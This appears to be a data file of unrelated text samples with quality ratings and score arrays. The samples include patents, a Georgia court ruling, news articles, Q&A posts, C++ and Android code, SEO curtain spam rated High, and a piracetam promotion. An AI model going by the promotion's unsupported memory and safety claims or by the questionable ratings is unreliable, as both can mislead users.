necessity of overhead. Moreover, related arts relating to transfer of serial data synchronous with a clock include the one described in conjunction with FIG. 15 in Document 2 (Japanese Unexamined Patent Publication No. 61-166244). Non-patent Document 1: Data Sheet TLE4230 GP, Infineon Technologies AG, Bereichs Kommunikation (Aug. 28, 2000) Patent Document 1: Japanese Unexamined Patent Publication No. 61-166244
High
[ 0.742175856929955, 31.125, 10.8125 ]
527 S.E.2d 283 (1999) 241 Ga. App. 689 PHILLIPS v. The STATE. No. A99A2501. Court of Appeals of Georgia. December 28, 1999. *284 Patterson & Patterson, Jackie G. Patterson, LaGrange, Yasma Patterson, for appellant. Louis J. Kirby, Solicitor, for appellee. BARNES, Judge. Carmen Phillips appeals her sentence on her first driving under the influence conviction, alleging the trial court erred by ruling that Georgia law required it to sentence her to 24 hours in jail. We affirm. An accusation charged Phillips with driving under the influence to the extent she was a less safe driver, driving with an alcohol concentration of 0.10 grams or more, and driving with a suspended license. The initial traffic citation indicated that a breath test revealed a blood alcohol concentration of 0.11 grams. She pled guilty, and the parties announced to the court that they had negotiated a plea agreement in which Phillips would plead guilty to driving while a less safe driver and the State would enter a nolle prosequi on the charge of driving with a blood alcohol concentration of 0.10 or greater. During the plea hearing, the trial court said, "And I see that you pulled a point count of 0.11. That alcohol was in your system while you were driving. Is that correct?" Phillips answered, "Yes, ma'am." While Phillips did not plead guilty to driving with a blood alcohol concentration greater than 0.10 grams or more, a violation of OCGA § 40-6-391(a)(5), she admitted driving with a blood alcohol concentration greater than 0.10 grams. Therefore the trial court was required to sentence her to at least 24 hours in jail under OCGA § 40-6-391(c)(1)(B), which provides for [a] period of imprisonment of not less than ten days nor more than 12 months, which period of imprisonment may, at the sole discretion of the judge, be suspended, stayed, or probated, except that if the offender's alcohol concentration at the time of the offense was 0.08 grams or more, the judge may suspend, stay, or probate all but 24 hours of any term of imprisonment imposed under this subparagraph. Phillips argued at the plea hearing that, because she was pleading only to having driven while a less safe driver and the solicitor agreed that she would not present any evidence of blood alcohol concentration, the trial court did not have to sentence her to 24 hours in jail. In response to that argument, the court replied, I've seen that before and I, frankly, feel like it's a perversion of the law rather than a correct interpretation of the law. So, I am going to give her the 24 hours.... [I] am pretty convinced from the language [of the statute] that that is just not the intent.... I do think that it's pretty clear what they intended was anything that was in existence, and the only time I would feel comfortable in waiving that is when there was a clear question as to the validity of the test. I don't think we have that here. "In determining what sentence to impose upon a defendant, a trial court may consider any evidence that was properly admitted during the guilt-innocence phase of the trial." (Emphasis supplied.) Boney v. Tims, 254 Ga. 664, 665, 333 S.E.2d 592 *285 (1985). Further, "sentencing courts are authorized to consider in aggravation any lawful evidence which tends to show the motive of the defendant, his lack of remorse, his general moral character, and his predisposition to commit other crimes." (Citation and punctuation omitted; emphasis supplied.) McClain v. State, 220 Ga.App. 474, 476(3), 469 S.E.2d 756 (1996). While the accusation itself was not evidence that the defendant actually was guilty of the crime charged, Graves v. State, 269 Ga. 772, 774(3), 504 S.E.2d 679 (1998), when lawful evidence such as the defendant's admission established she drove her car with a blood alcohol concentration greater than 0.10, the trial court was required to sentence her to serve at least 24 hours in jail pursuant to OCGA § 40-6-391(c)(1)(B). Therefore, we conclude that the trial court committed no error. Judgment affirmed. BLACKBURN, P.J., and ELDRIDGE, J, concur.
Mid
[ 0.6345733041575491, 36.25, 20.875 ]
Clint Eastwood’s “American Sniper” has wowed American audiences, but for one short week it also thrilled crowds in Baghdad. Iraq’s upscale Mansour Mall played the film for one week before the controversy surrounding the film prompted management to end showings. “Some people watching were just concentrating, but others were screaming ‘[expletive], shoot him! He has an IED, don’t wait for permission!’” said moviegoer Gaith Mohammed, the Global Post reported Wednesday. “I love watching war movies because especially now they give me the strength to face [the Islamic State].” A theater employee told the newspaper that the film’s run was ended because the hero, the late Navy SEAL Chris Kyle, was unapologetic about killing Muslims. Mr. Mohammed, asked by the newspaper if he agreed with some Western reviews that labeled the movie racist, replied, “No, why? The sniper was killing terrorists, the only thing that bothered me was when he said he didn’t know anything about the Koran!” A government ministry employee told the Post he didn’t enjoy the film, taking umbrage with the first scene and what he considered the movie’s overall anti-Muslim overtones. “The sniper, he has a chance to hit the child and his mother in their foot or anywhere without killing them, but he didn’t because he’s bloodthirsty like all the American troops,” said Wael, who declined to give his last name, the newspaper reported. Wael added that he had seen the film three times. “American Sniper,” which stars Bradley Cooper, has made $257 million worldwide in two weeks of release. The film, which has garnered six Oscar nominations, including Best Picture, was made on a budget of $58 million. Sign up for Daily Newsletters Manage Newsletters Copyright © 2020 The Washington Times, LLC. Click here for reprint permission.
Low
[ 0.5111111111111111, 31.625, 30.25 ]
FBI Says Device Encryption Is 'Evil' And A Threat To Public Safety from the thanks,-g-men.-we'll-take-it-under-advisement. dept The FBI continues its anti-encryption push. It's now expanded past Director Christopher Wray to include statements by other FBI personnel. Not that Chris Wray isn't taking every opportunity he can to portray personal security as a threat to the security of the American public. He still is. But he's no longer the only FBI employee willing to speak up on the issue. Wray expanded his anti-encryption rhetoric last week at a cybersecurity conference in New York. In short, encryption is inherently dangerous. And the FBI boss will apparently continue to complain about encryption without offering any solutions. The Federal Bureau of Investigation was unable to access data from nearly 7,800 devices in the fiscal year that ended Sept. 30 with technical tools despite possessing proper legal authority to pry them open, a growing figure that impacts every area of the agency's work, Wray said during a speech at a cyber security conference in New York. The FBI has been unable to access data in more than half of the devices that it tried to unlock due to encryption, Wray added. "This is an urgent public safety issue," Wray added, while saying that a solution is "not so clear cut." The solution is clear cut, even if it's not workable. What Wray wants is breakable encryption. And he wants companies to do the work and shoulder the blame. Wray wants to be able to show up at Apple's door with a warrant and walk away with the contents of someone's phone. How that's accomplished isn't really his problem. And he's not intellectually honest enough to own the collateral damage backdoored encryption would cause. But that's how Wray operates. He disparages companies, claiming encryption is all about profit and the government is all about caring deeply for public safety. Both statements are dishonest. But Wray isn't the only FBI employee taking the move to default encryption personally. And the others commenting are taking the rhetoric even further, moving towards personal attacks. On Wednesday, at the the International Conference on Cyber Security in Manhattan, FBI forensic expert Stephen Flatley lashed out at Apple, calling the company “jerks,” and “evil geniuses” for making his and his colleagues' investigative work harder. For example, Flatley complained that Apple recently made password guesses slower, changing the hash iterations from 10,000 to 10,000,000. That means, he explained, that “password attempts speed went from 45 passwords a second to one every 18 seconds,” referring to the difficulty of cracking a password using a “brute force” method in which every possible permutation is tried. [...] “At what point is it just trying to one up things and at what point is it to thwart law enforcement?" he added. "Apple is pretty good at evil genius stuff." This is great. Apple is now an "evil genius" because it made stolen iPhones pretty much useless to thieves. Sure, the device can be sold but no one's going to be able to drain a bank account or harvest a wealth of personal information. This was arguably in response to law enforcement (like the FBI!) complaining cellphone makers like Apple were assholes because they did so little to protect users from device theft. And why should they, these greedy bastards? Someone's phone gets stolen and the phone manufacturer now has a repeat customer. Encryption gets better and better, limiting the usefulness of stolen devices and now Apple is an "evil genius" engaged in little more than playing keepaway with device contents. Go figure. The FBI's phone hacker did have some praise for at least one tech company: Cellebrite. The Israeli hackers were rumored to have helped the FBI get into San Bernardino shooter Syed Farook's phone after a failed courtroom showdown with Apple. The FBI ended up with nothing -- no evidence on the phone and no court precedent forcing companies to hack away at their own devices anytime the government cites the 1789 All Writs Act. Now we're supposed to believe device makers are the villains and the nation's top law enforcement agency is filled with unsung heroes just trying to protect the public from greedy phone profiteers. I don't think anyone believes that narrative, possibly not even those trying to push it. Thank you for reading this Techdirt post. With so many things competing for everyone’s attention these days, we really appreciate you giving us your time. We work hard every day to put quality content out there for our community. Techdirt is one of the few remaining truly independent media outlets. We do not have a giant corporation behind us, and we rely heavily on our community to support us, in an age when advertisers are increasingly uninterested in sponsoring small, independent sites — especially a site like ours that is unwilling to pull punches in its reporting and analysis. While other websites have resorted to paywalls, registration requirements, and increasingly annoying/intrusive advertising, we have always kept Techdirt open and available to anyone. But in order to continue doing so, we need your support. We offer a variety of ways for our readers to support us, from direct donations to special subscriptions and cool merchandise — and every little bit helps. Thank you. –The Techdirt Team Filed Under: chris wray, encryption, fbi, going dark, stephen flatley Companies: apple
Low
[ 0.5050301810865191, 31.375, 30.75 ]
Egg Move Question Could a Larvesta know Fiery Dance if a male Volcarona knows it, but the female doesn't? The reason i ask is 1) i dont know if both the pokemon need to know the level-up move for it to be present in the offspring, and 2) technically, fiery dance cant be learned by larvesta---Black FC: 2366 2748 2343 (Kyle)
Low
[ 0.506465517241379, 29.375, 28.625 ]
Field of the Invention The present invention relates in general to computers, and more particularly for storing data deduplication metadata in a grid of processors in a computing environment. Description of the Related Art In today's society, computer systems are commonplace. Computer systems may be found in the workplace, at home, or at school. Computer systems may include data storage systems, or disk storage systems, to process and store data. Large amounts of data have to be processed daily and the current trend suggests that these amounts will continue being ever-increasing in the foreseeable future. An efficient way to alleviate the problem is by using deduplication. The idea underlying a deduplication system is to exploit the fact that large parts of the available data are copied again and again, by locating repeated data and storing only its first occurrence. Subsequent copies are replaced with pointers to the stored occurrence, which significantly reduces the storage requirements if the data is indeed repetitive.
Mid
[ 0.6012024048096191, 37.5, 24.875 ]
1. Field of the Invention The present invention relates to an electro-optical device, e.g. to an active liquid crystal electro-optical device, in particular, to a device provided with two complementary thin film insulated gate field effect transistors (hereinafter referred to as C/TFTs) having a structure of modified transfer gate MTG). Also, the present invention relates to a method for driving an active electro-optical device, in particular, to a method for driving an active electro-optical device with clear gradation level in a digital mode. 2. Description of the Prior Art An active liquid crystal electro-optical device utilizing TFT is conventionally know. In this device, an amorphous or polycrystalline semiconductor is used for TFT, while either one of conductive type alone is used for each picture element thereof. Namely, an N-channel TFT (referred to as NTFT) is generally linked to the picture element in series. Since the dielectric constant in a direction parallel to a molecular axis of the liquid crystal composition provided between substrates is different from that in a direction perpendicular thereto due to the material property thereof, arrangement of the composition con easily be made in both directions, horizontally or vertically, to the outside electric field. By utilizing the anisotropy of dielectric constant, the amount of transmitted light or of dispersion thereof is controlled in a liquid crystal electro-optical device, so as to perform on/off display. FIG. 3 shows an electro-optic property of nematic liquid crystal. When the applied voltage is small, which is indicated by Va or a point A, the amount of transmitted light is approximately 0%, and at Vb or point B, it is approximately 20%, while at Vc or point C, it is approximately 70%, and at Vd or point D, it amounts to approximately 100%. Therefore, when the points A and D alone are used, two-graded display in black-and-white is possible, while, when the points B, C, or the points where electro-optical property (transmittance) rises in FIG. 2, are used, the display of intermediate gradation is possible. As for the conventional electro-optical device utilizing TFTs, gradation display was performed by varying the voltage applied to a gate or the TFT or that applied between source and drain thereof, and controlling the voltage in an analogue mode. Concerning the conventional method of gradation display in the electro-optical device utilizing TFT, an explanation will be made: an N-channel thin film transistor used for the conventional electro-optical device has the voltage-current characteristic as shown in FIG. 3, which shows the voltage-current characteristic of the N-channel thin film transistor utilizing amorphous silicon, and of that utilizing poly-silicon. By controlling the voltage applied to a gate electrode of the thin film transistor having such characteristic in an analogue mode, drain current can be controlled and therefore strength of the electric field to be applied to the liquid crystal can be varied, whereby gradation display is possible. In the case of an electro-optical device having picture elements of, for example, 640×400 dots, however, it is difficult to manufacture all 236,000 TFTs without variation in characteristics thereof. It is thought that 15 gradation levels are limit of the number of gradation levels of such electro-optical device having 640×400 picture elements in order to achieve productivity and yield required for practical process. A gradation display may be performed by predetermining the value of gate voltage, while controlling only the turning of ON/OFF by gate voltage, and by variably controlling source or drain voltage. In this case, however, about 16 gradation levels are considered to be a limit, based on the fact that the characteristic are unstable. In an analogue mode of the gradation display control, clear display was difficult due to variation in characteristics of TFT. Another method of gradation display using multiple frames is suggested. As shown in the outline indicated in FIG. 11, when a gradation display is to be performed using, for example 10 frames, by making two frames out of ten transparent, while the remainder of eight frames nontransparent, average 20% of transparency can be displayed at picture element A. A picture element B displays 70% of transparency on an average in the same manner, while a picture element C 50% of transparency on an average. When such a display is carried out, however, since the number of frame is practically reduced thereby, flickering and display failure were generated. To solve the problem, the increasing of frame frequency, or the like, is suggested, whereas, the increase in power to be consumed in accordance with the increase in driving frequency, as well as the difficulty in the achievement of higher operation speed IC, indicated a limit of this method.
Low
[ 0.5110220440881761, 31.875, 30.5 ]
NASA astronaut Scott Kelly tweeted this photo on March 1, 2016, from the International Space Station, calling it his "last sunrise from space." U.S. astronaut Scott Kelly bid farewell to Twitter at the end of his yearlong mission this morning with a sequence of five sunrise photos before he leaves the International Space Station. Kelly has broken the American records for most time consecutively spent in space, and data from his and Russian cosmonaut Mikhail Kornienko's stay will help scientists evaluate the best ways to support humans in space for long journeys, such as a trip to Mars. Amid final preparations to leave with Kornienko and Russian cosmonaut Sergey Volkov, Kelly transferred command of the station to U.S. astronaut Tim Kopra yesterday afternoon. This afternoon (March 1) at 4:15 p.m. EST (2115 GMT) the trio will bid farewell to the other astronauts and begin the process of closing the hatch of their Soyuz craft — and you can watch that process live here on Space.com. The craft will depart from the space station this evening at 8:02 p.m. EST (0102 GMT) and will touch down in Kazakhstan about 3 hours later. In the meantime, Kelly capped off his year of tweeting from space with a series of photos — his final photos of Earth's sunrise. Kelly has been documenting his trip from the very beginning, tweeting a "thank you" to Michelle Obama for her best wishes and showing a photo of his crew quarters. Besides showing his daily life and beautiful glimpses of Earth (and playing "guess that location" with Twitter users), he would often tweet sunrise or sunset photos to wish the Twittersphere a good night or good morning. Incidentally, space station astronauts can observe around 16 sunsets per day as they orbit Earth. Kelly has also reached out through social media — responding to the public through Twitter and also with a recent Reddit thread. In an interview streamed from NASA TV Feb. 25, Kelly mentioned that he wasn't involved in photography at all before becoming an astronaut — but it's an important part of a space flier's job. The Earth offers such a great canvas, such a unique vantage point, that it's "mandatory" they share it with the public, he said. "I have taken a lot of pictures because I have been up here for a long time," Kelly said in a news conference from orbit. "Actually, numbers wise, I don't think I have taken that much compared to other crewmembers we have had up here. But I have definitely taken some good ones and some memorable ones." The second most impressive sight he's caught in space, he's said, was a series of spectacular auroras — first place goes to his very first view of Earth from space. Although he said the sunrise photos would be his last tweets, Kelly dashed off two more before he left — 1,000 tweets! Remember, you can watch Kelly, Kornienko and Volkov bid farewell to Kopra, British astronaut Tim Peake and Russian cosmonaut Yuri Malenchenko this afternoon and watch their descent after 8:02 p.m EST, with touchdown scheduled for around 11:25 p.m. EST in the Baikonur Cosmodrome in Kazakhstan. Email Sarah Lewin at [email protected] or follow her @SarahExplains. Follow us @Spacedotcom, Facebook and Google+. Original article on Space.com.
High
[ 0.678237650200267, 31.75, 15.0625 ]
Nation Sapura founder sues sons for millions KUALA LUMPUR: The publicity-shy Tan Sri Shamsuddin Abdul Kadir of Sapura Group is in the news but not for his entrepreneurial skills. He is taking his two sons to court. Shamsuddin, who got married to then 30-year-old Mariam Parineh Nariman from Iran in 2007, had filed a lawsuit against his children at the Shah Alam High Court in February. It was reported that Shamsuddin, who is the chairman and founder of Sapura Group, is demanding the return of shares and properties valued in excess of RM450mil from his two sons, Datuk Shahril Shamsuddin and Shahri­man Shamsuddin. It is learnt that court papers did not explain the reasons Shamsuddin, 80, is demanding the return of the assets, which include a 15% share in the family’s private investment vehicle called Sapura Holdings Sdn Bhd and other properties in the Klang Valley and Selangor. It is also learnt that the claim stated that Shamsuddin “gratuitously and without consideration” transferred the block of shares in Sapura Holdings and a total of 23 parcels of property to a private investment holding company Brothers Capital between 2007 and 2010. The Star had carried a report in June 2007 on how the father and son had built and fashioned a family-owned business empire. It was stated that when Shamsuddin founded the group in 1975, the company’s core business was essentially auto, defence, energy and later, ICT. However, in the late 1990s, when his son Shahril took over the reins and after a protracted lull, he slowly, but gradually, turned the group into what it is today – largely an oil and gas company. It said the group had transformed itself into the country’s most integrated and largest oil and gas service provider.
Low
[ 0.50755939524838, 29.375, 28.5 ]
#include "TestC.h" #include "TestImpl.h" #include "Client_Task.h" #include "ace/Get_Opt.h" #include "ace/Argv_Type_Converter.h" #include "tao/ORB_Core.h" // Ensure that the PI library is linked in when building statically #include "tao/PI/PI.h" #include "Server_Task.h" ////////////////////////////////////////////////////////////////////////// ACE_TString collocated_ior_file(ACE_TEXT("collocated_server.ior")); ACE_TString server_ior_file(ACE_TEXT("server.ior")); ////////////////////////////////////////////////////////////////////////// int parse_args (int argc, ACE_TCHAR *argv[]) { ACE_Get_Opt get_opts (argc, argv, ACE_TEXT("s:o:")); int c; while ((c = get_opts ()) != -1) switch (c) { case 's': server_ior_file = get_opts.opt_arg (); break; case 'o': collocated_ior_file = get_opts.opt_arg (); break; case '?': default: ACE_ERROR_RETURN ((LM_ERROR, "usage: %s " "-s <server_iorfile>" "-o <collocated_iorfile>" "\n", argv [0]), -1); } // Indicates successful parsing of the command line return 0; } int ACE_TMAIN(int argc, ACE_TCHAR *argv[]) { int failed = 0; ACE_CString server_orb; server_orb.set ("server_orb"); ACE_CString client_orb; client_orb.set ("client_orb"); try { ACE_Argv_Type_Converter satc (argc, argv); CORBA::ORB_var sorb = CORBA::ORB_init (satc.get_argc (), satc.get_TCHAR_argv (), server_orb.c_str ()); ACE_Argv_Type_Converter catc (argc, argv); CORBA::ORB_var corb = CORBA::ORB_init (catc.get_argc (), catc.get_TCHAR_argv (), client_orb.c_str ()); if (parse_args (argc, argv) != 0) return 1; { ACE_Manual_Event me; Server_Task server_task (collocated_ior_file.c_str(), sorb.in (), me, ACE_Thread_Manager::instance ()); if (server_task.activate (THR_NEW_LWP | THR_JOINABLE, 1, 1) == -1) { ACE_ERROR ((LM_ERROR, "Error activating server task\n")); } // Wait for the server thread to do some processing me.wait (); Client_Task client_task (corb.in (), ACE_Thread_Manager::instance (), collocated_ior_file, server_ior_file); if (client_task.activate (THR_NEW_LWP | THR_JOINABLE, 1, 1) == -1) { ACE_ERROR ((LM_ERROR, "Error activating client task\n")); } ACE_Thread_Manager::instance ()->wait (); } sorb->destroy (); } catch (const CORBA::Exception& ex) { ex._tao_print_exception ("Exception caught:"); return 1; } if (failed) { ACE_DEBUG ((LM_ERROR, "Test failed.\n") ); } return 0; }
Mid
[ 0.5469061876247501, 34.25, 28.375 ]
Q: How to pronounce "beach" and "bitch"? What's the difference? I often talk with friends using the phone and I'm not sure how to correctly pronounce the word "beach". Some people hear it as a "bitch". It really makes me upset! How do I pronounce these words correctly? What is the difference in pronunciation? A: My slavic language speaking colleagues all have this problem, because these languages do not make a distinction between tense vowels and lax vowels. The sound in beach is a tense [i], and the sound in bitch is a lax [ɪ]. These sounds differ in two major ways. First, the sounds are made in slightly different places in the mouth. The sound in [ɪ] is very close to [i], but is a little bit towards [e] (like the sound in "day"). So if you say [i] and hold it and then move your mouth to make [e], then somewhere along that path is something close to the sound [ɪ]. Second, the sounds differ in length. All tense vowels are slightly longer, and lax vowels are slightly shorter. If you have trouble figuring out the right way to articulate the sound, then the vowel length can be very helpful to at least help distinguish these sounds — even if it is not perfectly native sounding. A: If you are like me, you need to listen to the two words to understand the difference. This video explains how to pronounce "beach" and "bitch": Real ESL Video #22 - Bitch or Beach? Pronouncing i and e! Do you know how to pronounce "reach" and "rich"? It's the same thing. A: Beach contains a long i vowel and bitch contains a short i vowel. These two are an example of a minimal pair, a pair of words which is almost the same except for one sound (in this case the long/short i sound). There is a huge list of computer-generated minimal pairs at John Higgins's website.
Mid
[ 0.619444444444444, 27.875, 17.125 ]
With Republican leaders calling for repealing the federal estate tax in the upcoming tax debate, we’ve updated our estimates showing that the tax affects very few estates in each state and that its repeal would provide windfall tax cuts to the wealthiest heirs (see table). The estate tax applies only to the value of an estate that exceeds $5.5 million per person ($11 million per couple). That’s more than middle-income Americans typically earn in a lifetime. Nationally, just 5,400 estates — the wealthiest 0.2 percent of Americans who die — will owe any estate tax in 2018, Congress’ Joint Committee on Taxation estimates. And while President Trump called the tax a “tremendous burden” for small businesses and family farms, only 50 such estates will face it. Repeal would provide millions of dollars in tax cuts to the wealthiest estates and their heirs. Under a 2015 proposal that lawmakers re-introduced this year in both the House and Senate, taxable estates in 2018 would receive an average tax cut of more than $3 million. The 344 estates worth at least $50 million would receive tax cuts averaging over $20 million apiece. The proposal would also cost $269 billion over a decade, expanding deficits and, as a result, adding to pressure for cuts in federal programs.
Mid
[ 0.5408805031446541, 32.25, 27.375 ]
curtains for arched front doors with windows gorgeous window treatment ideas interesting small door,curtains to cover front doors elegant for entrance door designs with best curtain rod over,curtains front doors for small door windows best ideas on burlap kitchen curtain,curtain rod over front door hanging curtains entry best ideas on burlap kitchen,curtains front doors door window curtain designs for small sidelights on over,curtains for arched front doors best of the french door ideas with glass small windows,curtains for arched front doors over curtain rod door best the images on shades,curtain rod over front door side window curtains blinds image of for doors with glass mini windows,net curtains for front doors over entry door before and after updating the foyer windows on side,curtains for sidelights on front doors door windows the side curtain ideas cheap interior rod over.
High
[ 0.6570743405275781, 34.25, 17.875 ]
Mining companies want partnership Alfred Baku, Executive Vice President of Gold Fields West Africa Operations says a collaborative partnership between mining companies, governments, labour and communities will help mitigate the many challenges facing the industry. “Government must seek collaborative partnerships with miners who are better able to operate and develop ore bodies, and who are good social partners,” he said. Speaking under the topic ‘Resource Nationalism’ during an interaction with members of the Institute of Financial and Economic Journalists (IFEJ) organised in collaboration with the German Agency for International Cooperation (GIZ) at Tarkwa in the Western Region, Mr. Baku said government needs to create a climate conducive to responsible investment and provide policy certainty whereby it will stick to the rules. He explained that mining investments are under threat, as mining companies are cancelling new projects and closing mines due to pressure from price-dips, cost increases and higher taxes. “Equity investors have become frustrated as miners have spent their money with little to show for it. “Returns just do not warrant the risk. In reality, margins and returns from mining are in decline while operating cash flows are not sufficient to cover investments.” Gold has dropped 25 percent since the beginning of 2013, including a 2.7 percent drop to US$1,257 an ounce. Spot gold price decreased by 0.19 percent on Friday’s trading session on the back of rise in risk appetite on the global markets. He urged government to: create a climate conducive to responsible investment that provides policy certainty; develop infrastructure and the broader economy; partner to manage input costs; and help miners to procure locally. He again suggested a long-term commitments from government not to change the rules of the game. Mr. Baku explained that ‘Resource Nationalism’ is when countries make efforts to extract maximum value and developmental impact for their people from their finite natural resources. He observed that countries like Chile, Peru, Botswana and Zambia are making strides in addressing resource nationalism, and have put in place strategies, programmes and measures to remodel their fiscal margins. “Protecting investor rights will help countries make the most of their resources,” he said; “equity investors are frustrated,” he added. Presently, over US$87.5billion new mining projects worldwide have been delayed or cancelled He appealed to government to cut down on the country’s taxes regime to ensure a favourable mining investment destination. “We are appealing to government to come to our aid and loosen the fiscal regime, because the current gold price doesn’t help us at all. We are really in a difficult situation,” he said. Gold Fields’s all-in cost of production in Ghana is US$1,200 an ounce, Baku said. A study of 40 top mining companies in 2012 indicated that they were operating at a loss due to the general economic hardship -- with some closing down and making people lose their jobs, whereas everybody’s focus is on the resources in the sector.
Mid
[ 0.654867256637168, 37, 19.5 ]
Tag Archives: piracetam benefits There are several ways to improve your memory if Josh Waitzkin is to be believed. He is a memory champion and largely considered a prodigy for chess and many other things. He is great at anything memory related, but sometimes brain training games can only take you so far. Or more realistically, sometimes we all want an easier route to a great memory. For many people, this easy route is nootropics or smart drugs. These drugs are cognitive enhancing compounds that can have an effect on your abilities and with memory, piracetam (and the whole family of drugs) are some of the most helpful. Piracetam and Memory Formation Starting a regimen with piracetam has been shown to vastly improve memory formation due to the interactions within the brain. These are often through parts of the brain called the hippocampus where memories are formed. Once you have taken piracetam for a period of time, the effects will start to come on. Many people consider piracetam the birthplace of nootropics and it is no wonder so many people are using it for enhanced memory. The piracetam smart drug is definitely one of the best for improving your cognitive abilities so keep that in mind before you make any other purchases. Another important thing to consider is that noopept is considered to be 1000 times stronger than piracetam. This is a drug that has a lot of potential, which is why it is still prescribed to people who are living in Russia and suffering from a loss of memory. Are There Side Effects with Piracetam? Everyone who has experience with piracetam is concerned at some point or another with the side effects. Most of the time, this is nothing to worry about if you are putting the right doses into your body at the right time. There will always be risks, but with piracetam you have a lot fewer than many of the other products on the market. If you have any problems with piracetam, it might be because you need more acetylcholine, which you can get through a choline supplement.
High
[ 0.6790697674418601, 36.5, 17.25 ]
Cytostatic factor (CSF) activity in cytosols extracted from Xenopus laevis eggs. Cytostatic factor (CSF), found in the cytoplasm of unfertilized eggs of amphibians, causes metaphase arrest when microinjected into cleaving blastomeres. Although CSF from Rana pipiens eggs has been extracted and characterized, little is known about CSF extracted from eggs of other species. We investigated the conditions required to preserve CSF activity in cytosols extracted from Xenopus laevis eggs and found that it was necessary to expose the eggs to CO2 prior to extraction and that the extraction buffer must contain sodium beta-glycerophosphate. CSF activity disappeared after 24 h of storage at 2 degrees C. Cytological examination showed that the arrested blastomeres injected with cytosols had been arrested at metaphase and contained a spindle lacking polar asters, in which highly condensed chromosomes were embedded.
High
[ 0.663265306122448, 32.5, 16.5 ]
Q: Android CollapsingToolbar/ AppBarLayout scroll behind status bar behaviour top padding I'd like to use CoordinatoryLayout, AppBarLayout and CollapsingToolbarLayout to create a layout that resembles the below example from Google Calendar. The key things I'm trying to replicate: Scrolling the content behind the status bar Rounded corners at the top of the scroll container Enough room at the top of the screen for the header to not look squashed The Question Google Calendar appears to be growing the scroll container as the user scrolls. How would I go about doing this or something similar to achieve the look I'm after? I've put together a quick example of what I'm trying to build: activity_scrolling.xml <androidx.coordinatorlayout.widget.CoordinatorLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:animateLayoutChanges="true" tools:context="uk.co.exampleapplication.ScrollingActivity"> <com.google.android.material.appbar.AppBarLayout android:id="@+id/app_bar_layout" android:layout_width="match_parent" android:layout_height="wrap_content"> <com.google.android.material.appbar.CollapsingToolbarLayout android:id="@+id/collapsing_toolbar" android:layout_width="match_parent" android:layout_height="match_parent" app:layout_scrollFlags="scroll|exitUntilCollapsed"> <include android:id="@+id/lay_header" layout="@layout/layout_header" /> </com.google.android.material.appbar.CollapsingToolbarLayout> <androidx.constraintlayout.widget.ConstraintLayout android:layout_width="match_parent" android:layout_height="wrap_content" android:background="@drawable/scroll_header_background" android:elevation="16dp" android:paddingBottom="12dp"> <TextView android:id="@+id/sectionTitleText" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginStart="16dp" android:layout_marginTop="32dp" android:text="Title" app:layout_constraintStart_toStartOf="parent" app:layout_constraintTop_toTopOf="parent" /> <Button android:id="@+id/filter_button" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_marginTop="22dp" android:layout_marginEnd="16dp" android:text="Button" app:layout_constraintEnd_toEndOf="parent" app:layout_constraintTop_toTopOf="parent" /> </androidx.constraintlayout.widget.ConstraintLayout> </com.google.android.material.appbar.AppBarLayout> <androidx.core.widget.NestedScrollView android:layout_width="match_parent" android:layout_height="match_parent" app:layout_behavior="@string/appbar_scrolling_view_behavior" tools:context=".ScrollingActivity" tools:showIn="@layout/activity_scrolling"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_margin="@dimen/text_margin" android:text="@string/large_text" /> </androidx.core.widget.NestedScrollView> </androidx.coordinatorlayout.widget.CoordinatorLayout> layout_header.xml <?xml version="1.0" encoding="utf-8"?> <androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto" xmlns:tools="http://schemas.android.com/tools" android:id="@+id/header" android:layout_width="match_parent" android:layout_height="wrap_content" android:orientation="vertical" android:paddingHorizontal="16dp" android:paddingTop="60dp" android:paddingBottom="40dp" app:layout_collapseMode="parallax" tools:ignore="HardcodedText"> <TextView android:id="@+id/title" android:layout_width="match_parent" android:layout_height="24dp" android:layout_marginTop="8dp" android:layout_marginEnd="16dp" android:text="Title" android:textColor="#FFF" android:textSize="20sp" app:layout_constraintStart_toStartOf="parent" app:layout_constraintTop_toTopOf="parent" /> <TextView android:id="@+id/subtitle" android:layout_width="match_parent" android:layout_height="wrap_content" android:text="Subtitle" android:textColor="#FFF" android:textSize="16sp" app:layout_constraintHorizontal_bias="0.0" app:layout_constraintStart_toStartOf="parent" app:layout_constraintTop_toBottomOf="@+id/title" /> </androidx.constraintlayout.widget.ConstraintLayout> scroll_header_background.xml <?xml version="1.0" encoding="utf-8"?> <shape xmlns:android="http://schemas.android.com/apk/res/android" android:shape="rectangle"> <corners android:bottomLeftRadius="0dp" android:bottomRightRadius="0dp" android:topLeftRadius="20dp" android:topRightRadius="20dp" /> <solid android:color="#FFFFFF" /> <size android:width="64dp" android:height="64dp" /> </shape> My attempt is included below. The header scrolls behind the toolbar as desired but I'd like some additional top padding above my views (about the height of the top inset/ status bar would be sufficient). Google Calendar appears to be solving this by having the container grow as the user scrolls. A: Implement an AppBarLayout.OnOffsetChangedListener that will adjust top padding on the ConstraintLayout that holds the TextView and the Button. (Call this view "viewToGrow".) You can also do other things in the listener like change the corner radius of the drawable as the appbar scrolls. The following example adjusts top padding to give the header more room. This padding is increased as the appbar scrolls up and decreases as it scrolls down. The demo app also removes the corner radius of the drawable during the final 15% of the appbar scroll. ScrollingActivity class ScrollingActivity : AppCompatActivity() { override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_scrolling) val viewToGrow: View = findViewById(R.id.viewToGrow) val baseTopPadding = viewToGrow.paddingTop // Determine how much top padding has to grow while the app bar scrolls. var maxDeltaPadding = 0 val contentView = findViewById<View>(android.R.id.content) ViewCompat.setOnApplyWindowInsetsListener(contentView) { _, insets -> maxDeltaPadding = insets.systemWindowInsetTop insets } // Get key metrics for corner radius shrikage. var backgroundRadii: FloatArray? = null var maxRadius: FloatArray? = null val backgroundDrawable = (viewToGrow.background as GradientDrawable?) if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.N && backgroundDrawable != null) { backgroundRadii = backgroundDrawable.cornerRadii maxRadius = floatArrayOf(backgroundRadii!![0], backgroundRadii[1]) } // Set up the app bar and the offset change listener. val appBar: AppBarLayout = findViewById(R.id.app_bar_layout) val appBarTotalScrollRange: Float by lazy { 